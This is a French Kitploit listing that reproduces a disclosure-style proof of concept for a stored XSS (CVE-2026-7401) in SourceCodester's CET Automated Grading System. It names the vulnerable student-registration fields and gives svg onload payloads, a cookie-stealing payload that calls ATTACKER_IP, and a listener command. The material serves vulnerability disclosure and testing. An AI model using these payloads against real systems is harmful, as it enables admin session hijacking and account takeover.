Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-7401-XSS — Preuve de concept pour une XSS stockée dans SourceCodester CET Automated Grading System 1.0, démontrant l'injection de charge utile non authentifiée via l'inscription d'un étudiant, conduisant au détournement de session administrateur. | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-7401-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

Preuve de concept pour une XSS stockée dans SourceCodester CET Automated Grading System 1.0, démontrant l'injection de charge utile non authentifiée via l'inscription d'un étudiant, conduisant au détournement de session administrateur.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

XSS stocké dans le système de notation automatisé CET — Inscription des étudiants (non authentifié → tableau de bord administrateur)

Détails

ChampValeur
FournisseurSourceCodester
URL du fournisseurhttps://www.sourcecodester.com
ProduitSystème de notation automatisé CET avec analyses prédictives IA en PHP et MySQL
URL du produithttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
Version1.0
VulnérabilitéCross-Site Scripting stocké (XSS)
CWECWE-79
Score CVSSv38,8 (Élevé)
Vecteur d'attaqueRéseau
Authentification requiseAucune (l'auto-inscription des étudiants est publique)
VictimeAdministrateur
Interaction utilisateurRequise (l'administrateur visite le tableau de bord)
ChercheurImad Alvi
Date2026-04-13

Composant concerné

Fichier : PersonalAGS/index.php?action=register (Inscription des étudiants)
Paramètres : student_id, full_name, section, username (POST)
Déclenché sur : PersonalAGS/index.php?action=dashboard (Tableau de bord administrateur)


Description

Le portail d'auto-inscription des étudiants du système de notation automatisé CET 1.0 ne parvient pas à assainir ni à encoder les entrées fournies par l'utilisateur avant de les stocker dans la base de données. Un attaquant non authentifié peut créer un compte étudiant avec des charges utiles JavaScript injectées dans n'importe quel champ d'inscription. La charge utile malveillante est stockée dans la base de données et s'exécute dans le navigateur de tout administrateur qui visite le tableau de bord où les étudiants inscrits sont répertoriés.

Il s'agit d'une chaîne d'attaque critique — aucune authentification n'est requise pour injecter la charge utile, mais elle s'exécute dans un contexte administrateur privilégié, permettant le vol de cookies de session et la prise de contrôle totale du compte administrateur.


Preuve de concept

Étape 1 — Accéder à l'inscription des étudiants (aucune authentification requise)

Accédez à la page publique d'auto-inscription des étudiants :

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

Étape 2 — Injecter la charge utile XSS dans les champs d'inscription

Remplissez tous les champs avec des charges utiles XSS et cliquez sur Créer un compte :

  • Numéro d'identification étudiant : "><svg onload=alert(1)>
  • Nom complet : "><svg onload=alert(1)>
  • Section : "><svg onload=alert(1)>
  • Nom d'utilisateur souhaité : "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

L'inscription réussit — les charges utiles sont stockées dans la base de données.

Étape 3 — Le XSS se déclenche sur le tableau de bord administrateur

Lorsque l'administrateur se connecte et visite le tableau de bord, la charge utile injectée s'exécute immédiatement. La fenêtre contextuelle d'alerte se déclenche et la mise en page de la page est visiblement cassée par le HTML injecté — confirmant que la charge utile est rendue sans assainissement dans le panneau d'administration.

Les en-têtes de section du tableau de bord reflètent également les valeurs injectées :

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

Charge utile de détournement de session

Un attaquant peut faire escalader cette vulnérabilité en détournement complet de session administrateur en utilisant la charge utile suivante dans les champs d'inscription :

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

Configurez un écouteur sur la machine de l'attaquant :

root@kitploit:~
python3 -m http.server 8888

Lorsque l'administrateur visite le tableau de bord, son cookie de session est envoyé au serveur de l'attaquant, permettant une prise de contrôle complète du compte.


Impact

Un attaquant non authentifié peut :

  • Injecter du JavaScript persistant dans le tableau de bord administrateur via l'inscription publique des étudiants
  • Voler le cookie de session de l'administrateur et prendre le contrôle du compte administrateur
  • Effectuer toute action administrative au nom de la victime
  • Rediriger les administrateurs vers des pages malveillantes
  • Défigurer le tableau de bord administrateur

Aucune authentification n'est requise pour injecter la charge utile. L'attaque s'exécute automatiquement lorsqu'un administrateur visite le tableau de bord.


Références

  • SourceCodester — Système de notation automatisé CET
  • CWE-79 : Neutralisation incorrecte des entrées lors de la génération de pages Web.
Télécharger l’outil